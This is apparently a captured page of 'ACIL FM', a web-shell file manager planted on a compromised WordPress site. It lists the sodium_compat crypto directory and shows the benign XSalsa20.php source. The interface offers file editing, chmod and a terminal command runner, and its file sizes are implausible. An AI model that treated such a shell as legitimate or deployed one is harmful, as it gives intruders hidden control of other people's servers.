ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site BKP/wp-includes/sodium_compat/src/Core
/
home
mhhtmff
www
site BKP
wp-includes
sodium_compat
src
Core
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Base64
-
chmod
Open
Rename
Delete
ChaCha20
-
chmod
Open
Rename
Delete
Curve25519
-
chmod
Open
Rename
Delete
Poly1305
-
chmod
Open
Rename
Delete
SecretStream
-
chmod
Open
Rename
Delete
BLAKE2b.php
23.63 MB
chmod
View
DL
Edit
Rename
Delete
ChaCha20.php
12.63 MB
chmod
View
DL
Edit
Rename
Delete
Curve25519.php
139.29 MB
chmod
View
DL
Edit
Rename
Delete
Ed25519.php
17.07 MB
chmod
View
DL
Edit
Rename
Delete
HChaCha20.php
3.78 MB
chmod
View
DL
Edit
Rename
Delete
HSalsa20.php
3.59 MB
chmod
View
DL
Edit
Rename
Delete
Poly1305.php
1.54 MB
chmod
View
DL
Edit
Rename
Delete
Ristretto255.php
21.37 MB
chmod
View
DL
Edit
Rename
Delete
Salsa20.php
8.04 MB
chmod
View
DL
Edit
Rename
Delete
SipHash.php
8.04 MB
chmod
View
DL
Edit
Rename
Delete
Util.php
27.6 MB
chmod
View
DL
Edit
Rename
Delete
X25519.php
9.23 MB
chmod
View
DL
Edit
Rename
Delete
XChaCha20.php
3.29 MB
chmod
View
DL
Edit
Rename
Delete
XSalsa20.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site BKP/wp-includes/sodium_compat/src/Core/XSalsa20.php
<?php if (class_exists('ParagonIE_Sodium_Core_XSalsa20', false)) { return; } /** * Class ParagonIE_Sodium_Core_XSalsa20 */ abstract class ParagonIE_Sodium_Core_XSalsa20 extends ParagonIE_Sodium_Core_HSalsa20 { /** * Expand a key and nonce into an xsalsa20 keystream. * * @internal You should not use this directly from another application * * @param int $len * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20($len, $nonce, $key) { $ret = self::salsa20( $len, self::substr($nonce, 16, 8), self::hsalsa20($nonce, $key) ); return $ret; } /** * Encrypt a string with XSalsa20. Doesn't provide integrity. * * @internal You should not use this directly from another application * * @param string $message * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20_xor($message, $nonce, $key) { return self::xorStrings( $message, self::xsalsa20( self::strlen($message), $nonce, $key ) ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply